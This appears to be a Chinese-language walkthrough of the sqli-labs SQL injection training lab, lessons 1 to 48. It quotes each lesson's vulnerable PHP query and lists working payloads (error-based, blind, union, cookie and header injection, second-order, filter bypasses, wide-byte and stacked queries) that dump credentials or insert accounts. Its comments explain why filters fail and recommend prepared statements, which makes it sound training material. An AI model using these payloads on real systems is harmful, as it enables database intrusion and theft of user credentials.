一 ' （单引号闭合。下文的 %23 是 URL 编码的 #，用来注释掉闭合点之后的原始 SQL）
?id=1'
?id=1' and 1=1%23
?id=1' and 1=2%23
二 数值
?id=1'
?id=1 and 1=1%23
?id=1 and 1=2%23
三 ')
?id=1'
?id=1') and 1=1%23
?id=1') and 1=2%23
四 ")
?id=1")
?id=1") and 1=1%23
?id=1") and 1=2%23
五 ' 报错
1' and updatexml(1,concat(0x23,(database())),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23
六 " 报错
1" and updatexml(1,concat(0x23,(database())),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23
七 ')) 盲注
1')) and length(database())=8 %23 //求数据库的长度
1')) and ascii(substr(database(),1,1))=115%23 //求数据库名的ascii值
1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23 //求表的数量
1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23 //求表名的ascii码值
1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23 //求列的数量
1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23 //求列名的ascii码值
1')) and (select count(username) from security.users)=13 %23 //求 users 表的行数（字段内容由下一条逐字符比较 ascii 得出）
1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23 //求字段的ascii码值
八 ' 盲注
(参考七)
九 ' 时间型盲注
?id=1' and if(length(database())>10,sleep(0),sleep(5))%23 //条件为真不延时、为假延时 5 秒，按响应时间区分真假
十 " 时间型盲注
(参考九)
十一 '报错
@$sql="SELECT username,password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username输入:admin
password输入:admin' and updatexml(1,concat(0x23,(database())),0)#
admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)#
十二 ")报错
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username输入:admin
password输入:1") and updatexml(1,concat(0x7e,(database())),0)#
(参考十一)
十三 ')报错
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
username输入:admin
password输入:admin') and updatexml(1,concat(0x7e,(database())),0)#
(参考十一)
十四 "报错
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
username输入:admin
password输入:admin" and updatexml(1,concat(0x7e,(database())),0)#
(参考十一)
十五 '(布尔型、时间)盲注
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username输入:admin
password输入:admin' and sleep(if(length(database())>10,0,5))#
十六 "(布尔型、时间)盲注
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username输入:admin
password输入:admin") and sleep(if(length(database())>10,0,5))#
十七 报错（注入点是密码重置 UPDATE 语句中的 $passwd；username 需填存在的账号，如 admin）
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
username admin
password admin' or updatexml(1,concat(0x7e,(database())),0) or '1
十八 User-Agent报错 burp拦截（INSERT 语句使用登录后的 $uname，需先用正确账号密码登录成功才会触发）
username admin
password admin
$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
uagent后加 1' or updatexml(1,concat(0x7e,(database())),0) or '
十九 referer报错 burp拦截
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
referer后加 1' or updatexml(1,concat(0x7e,(database())),0) or '
二十 ' burp拦截 联合查询
第一步:用某一个账号aaa登录成功
第二步:刷新页面,用burp拦截,修改cookie字段
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
在uname=aaa后输入 ' order by 3%23
在uname=aaa后输入 ' and 1=2 union select 1,2,3%23
在uname=aaa后输入 ' and 1=2 union select 1,database(),3%23
在uname=aaa后输入 ' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
在uname=aaa后输入 ' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
在uname=aaa后输入 ' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
二十一 ') burp拦截 联合查询
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
与二十题基本相似,不同的是,闭合条件为单引号加括号,cookie中uname编码为base64
uname=aaa') order by 3# -> uname=YWFhJykgb3JkZXIgYnkgMyM= （原文的 YWEnKSBvcmRlciBieSAzIw== 解码后是 aa') order by 3#，与左侧不一致）
uname=aaa') and 1=2 union select 1,2,3# -> uname=YWFhJykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
uname=') and 1=2 union select 1,2,database()# -> uname=JykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
(参考二十)
二十二 " burp拦截 联合查询
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
与二十一题基本相似,不同的是,闭合条件为双引号
(参考二十一)
二十三 ' 联合查询
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$id=$_GET['id']; //（原源码中此行位于上面两处 preg_replace 之前；过滤只去掉 # 和 --，所以下面的 payload 用末尾的 '3 / '1'='1 闭合引号，而不用注释符）
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,2,'3
1' and 1=2 union select 1,database(),'3
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users where '1'='1
二十四
用户注册login_create.php
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
username输入:admin'#   （注册后库中存储的用户名就是 admin'#，为后面的二次注入埋点）
password随意
用户登录login.php
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
密码修改pass_change.php
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
二次注入（second-order injection）：注册时存入的用户名 admin'# 本身不触发问题；修改密码时用户名来自 $_SESSION 且未转义，UPDATE 拼成 ... where username='admin'#' and password='...'，# 注释掉了当前密码校验，结果直接改掉真实 admin 账号的密码。
二十五 联合查询
$id=$_GET['id'];
$id= blacklist($id);
// sqli-labs Less-25 "blacklist" filter, quoted verbatim for analysis.
// Single-pass, non-recursive denylist: each case-insensitive "or"/"and" substring is
// removed once, so "oorr" -> "or" and "anandd" -> "and" survive (the bypass used below).
// It also mangles harmless identifiers that contain "or", e.g. information_schema,
// password, order — hence the doubled letters in the payloads.
// A denylist is not a fix for string-built SQL; bind $id as a query parameter instead.
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); // delete every "or" (case-insensitive), one pass
$id= preg_replace('/AND/i',"", $id); // delete every "and" (case-insensitive), one pass
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' anandd 1=2 union select 1,2,'3
1' anandd 1=2 union select 1,database(),'3
1' anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security
1' anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users
1' anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users where '1'='1
二十五a 联合查询
$id=$_GET['id'];
$id= blacklist($id);
// sqli-labs Less-25a: identical filter to Less-25, but the query below uses id=$id with
// no quotes, so no string closing is needed and %23 (#) can terminate the statement.
// The filter is still a single non-recursive pass: "oorr" -> "or", "anandd" -> "and".
// Denylisting keywords does not make string-built SQL safe; use a bound parameter.
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); // delete every "or" (case-insensitive), one pass
$id= preg_replace('/AND/i',"", $id); // delete every "and" (case-insensitive), one pass
return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
?id=1 oorr updatexml(1,concat(0x23,database()),1)%23  （过滤后实际执行：SELECT * FROM users WHERE id=1 or updatexml(1,concat(0x23,database()),1)# LIMIT 0,1）
1 oorrder by 3%23
1 anandd 1=2 union select 1,2,3%23
1 anandd 1=2 union select 1,database(),3%23
1 anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
1 anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'%23
1 anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users%23
二十六 联合查询
$id=$_GET['id'];
$id= blacklist($id);
// sqli-labs Less-26 filter, quoted verbatim. Every rule is one non-recursive pass, so
// doubled keywords ("anandd", "oorr") survive. Comment terminators and whitespace are
// stripped, which is why the payloads below use %0B as the separator and close the
// string with a trailing '3 / '1'='1 instead of a comment.
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); // delete every "or" (case-insensitive), one pass
$id= preg_replace('/and/i',"", $id); // delete every "and" (case-insensitive), one pass
$id= preg_replace('/[\/\*]/',"", $id); // character class: deletes each "/" and each "*" individually, not just the "/*" sequence
$id= preg_replace('/[--]/',"", $id); // character class: deletes every single "-" (so "--" is gone too)
$id= preg_replace('/[#]/',"", $id); // deletes "#"
$id= preg_replace('/[\s]/',"", $id); // deletes whitespace; the payloads rely on %0B (vertical tab) slipping through — older PCRE did not treat VT as \s, newer builds do, so confirm on the target PHP version
$id= preg_replace('/[\/\\\\]/',"", $id); // deletes "/" and "\" (the pattern is a class of slash and backslash)
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name='users
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,group_concat(username,0x23,passwoorrd)%0Bfrom%0Bsecurity.users%0Bwhere%0B'1'='1
二十六a联合查询
$id=$_GET['id'];
$id= blacklist($id);
// sqli-labs Less-26a filter, same rules as Less-26; the query below wraps the value as
// ('$id'), so the payloads close with ('3 / ('1'='1 rather than a bare quote.
// Each rule is a single non-recursive replacement, hence "anandd" -> "and".
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); // delete every "or" (case-insensitive), one pass
$id= preg_replace('/and/i',"", $id); // delete every "and" (case-insensitive), one pass
$id= preg_replace('/[\/\*]/',"", $id); // character class: deletes each "/" and "*" separately
$id= preg_replace('/[--]/',"", $id); // character class: deletes every "-"
$id= preg_replace('/[#]/',"", $id); // deletes "#"
$id= preg_replace('/[\s]/',"", $id); // deletes whitespace; payloads use %0B (VT), which older PCRE did not match with \s — verify on the target PHP/PCRE version
$id= preg_replace('/[\/\\\\]/',"", $id); // deletes "/" and "\"
return $id;
}
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0B infoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name=('users
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(username,0x23,passwoorrd),3%0bfrom%0bsecurity.users%0bwhere%0b('1'='1
二十七
// sqli-labs Less-27 filter, quoted verbatim. None of the keyword patterns use the /i
// flag (the /m and /s flags are multiline and dotall, not case-insensitive), so only the
// exact spellings union/UNION/Union and select/SELECT/Select are removed; mixed case
// such as uNion / selEct passes untouched. Only the literal space and "+" are stripped,
// so other whitespace (the %0B in the payloads) remains a valid separator.
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); // deletes each "/" and "*" character
$id= preg_replace('/[--]/',"", $id); // deletes every "-"
$id= preg_replace('/[#]/',"", $id); // deletes "#"
$id= preg_replace('/[ +]/',"", $id); // deletes the space character and "+" (not "one or more spaces")
$id= preg_replace('/select/m',"", $id); // removes lowercase "select" only; /m is multiline mode, not case-insensitive
$id= preg_replace('/[ +]/',"", $id); // repeated: deletes space and "+" again
$id= preg_replace('/union/s',"", $id); // lowercase "union" only; /s is dotall, not case-insensitive
$id= preg_replace('/select/s',"", $id); // lowercase "select" only
$id= preg_replace('/UNION/s',"", $id); // uppercase only
$id= preg_replace('/SELECT/s',"", $id); // uppercase only
$id= preg_replace('/Union/s',"", $id); // capitalised only
$id= preg_replace('/Select/s',"", $id); // capitalised only — any other casing (uNion, selEct) survives
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name='users
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B'1'='1
二十七a
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2, "3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),"3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema="security
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name="users
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B"1"="1
二十八
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// sqli-labs Less-28 filter, quoted verbatim. The keyword rule is case-insensitive but
// only matches "union" + whitespace + "select" as one sequence; the payloads place %0B
// (vertical tab) between the two words, which older PCRE did not count as \s. On a
// newer PHP/PCRE this particular separator may be matched and the bypass fails — confirm.
// Spaces and "+" are stripped beforehand, so a plain "union select" could never reach
// the keyword rule intact anyway.
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); // deletes each "/" and "*"
$id= preg_replace('/[--]/',"", $id); // deletes every "-"
$id= preg_replace('/[#]/',"", $id); // deletes "#"
$id= preg_replace('/[ +]/',"", $id); // deletes the space character and "+"
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); // repeated: deletes space and "+" again
$id= preg_replace('/union\s+select/i',"", $id); // case-insensitive, but only the exact "union<ws>select" sequence; or/and are not filtered here
return $id;
}
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name=('users
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0Bsecurity.users%0Bwhere%0B('1'='1
二十八a
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// sqli-labs Less-28a filter: every rule except the union\s+select one is commented out,
// so comment terminators, spaces, or/and all pass through. Only the exact
// "union" + whitespace + "select" sequence is removed (case-insensitive); the payloads
// separate the two words with %0B, which older PCRE did not treat as \s — confirm on
// the target PHP version.
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
//$id= preg_replace('/[--]/',"", $id); //Strip out --.
//$id= preg_replace('/[#]/',"", $id); //Strip out #.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); // the only active rule: removes "union<ws>select", case-insensitively
return $id;
}
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band%0btable_name=('users
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,password),3%0Bfrom%0B security.users%0Bwhere%0B('1'='1
二十九
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1" order by 3%23
1" and 1=2 union select 1,2,3%23
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1" and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十一
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
1") order by 3%23
1") and 1=2 union select 1,2,3%23
1") and 1=2 union select 1,database(),3%23
1") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1") and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十二 宽字节注入（下面的 check_addslashes 在引号前补 \；连接字符集为 GBK 时，%df 与转义符 \ (0x5c) 被当成一个双字节字符，引号得以逃逸。由于引号会被转义，库名/表名改用 0x 十六进制写法）
$id=check_addslashes($_GET['id']);
// sqli-labs Less-32 hand-rolled escaping, quoted verbatim: prefixes backslash, single
// quote and double quote with a backslash. It is not charset-aware. With a GBK
// connection charset (set by the lab elsewhere — not visible here) the byte %df
// followed by the inserted 0x5c backslash is decoded as one two-byte character, so the
// quote that follows is no longer escaped. This is the "wide byte" bypass used below;
// the fix is a prepared statement, not more escaping.
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); // escape each backslash (replacement-string escaping is fiddly; verify the exact output)
$string = preg_replace('/\'/i', '\\\'', $string); // ' -> \'
$string = preg_replace('/\"/', "\\\"", $string); // " -> \"
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十三
$id=check_addslashes($_GET['id']);
// sqli-labs Less-33: same idea as Less-32 but using PHP's addslashes(). addslashes is
// byte-oriented and knows nothing about the connection charset, so the same %df + \
// wide-byte bypass applies (payloads below are identical to Less-32).
function check_addslashes($string)
{
$string= addslashes($string); // prefixes ' " \ and NUL with a backslash, byte by byte
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十四 联合 burp拦截（POST 宽字节：浏览器表单提交会把 % 再次编码，故在 burp 中直接改包发送原始的 %df）
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x61646d696e(admin) //字符串的十六进制写法，引号被转义时可用它代替 'admin' 之类的字符串字面量
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23
三十五 （id 为数值型、SQL 中不加引号，addslashes 转义的引号根本用不上，直接数值注入）
$string = addslashes($string);
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十六 mysql_real_escape_string 仍可被宽字节绕过（连接字符集为 gbk 而客户端库未通过 mysql_set_charset 获知时，转义不感知多字节）。原笔记：MYSQL文件里面的my.ini里面的gbk改为Latin1（环境配置备注，具体含义待确认）
$id=check_quotes($_GET['id']);
// sqli-labs Less-36: escaping via mysql_real_escape_string(). This function is only
// charset-aware when the client library was told the charset through
// mysql_set_charset(); if the charset was changed with a plain "SET NAMES gbk" (as the
// lab appears to do — not shown here), the library still escapes per its default charset
// and the %df wide-byte bypass works exactly as in Less-32/33. Prepared statements avoid
// the problem entirely.
function check_quotes($string)
{
$string= mysql_real_escape_string($string); // escapes quotes/backslash for the connection's known charset
return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
三十七 burp拦截
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23
三十八 ' 基于联合查询的堆叠注入（联合查询部分同前；堆叠注入要求后端以多语句方式执行，如 mysqli_multi_query，分号之后可拼接任意 DML）
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
1';insert into users(username,password) values('less38','less38')%23 //该语句会真正写入一行数据，仅在靶场环境使用
三十九 数值
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(参考三十八)
四十 ')
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1') order by 3%23
1') and 1=2 union select 1,2,3%23
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1') and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(参考三十八)
四十一
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(参考三十八)
四十二 堆叠注入 报错（login_password 直接取 $_POST 未转义，注入点在密码字段；用户名虽经 mysqli_real_escape_string 但无济于事）
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
账号随意
密码 a';create table W like users# //添加表
密码 a';insert into users values(20,'xj','xj123')# //添加账号密码（未写列名列表，依赖 users 表的列序，此处按 id,username,password）
登录进去修改密码
四十三
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(21,'xj','xj123')#
同上
四十四
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
a';insert into users values(22,'w','w')#
同上
四十五
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(23,'j','j')#
同上
四十六 报错
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 desc 或者asc,显示结果不同,表明可以注入
sort=1 and updatexml(1,concat(0x23,database()),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1) 显示不完全（updatexml 报错回显长度有限，约 32 字符，需用 substr()/mid() 分段或 limit 逐行读取）
四十七
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and updatexml(1,concat(0x23,database()),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23 显示不完全
四十八 错误不回显 时间盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
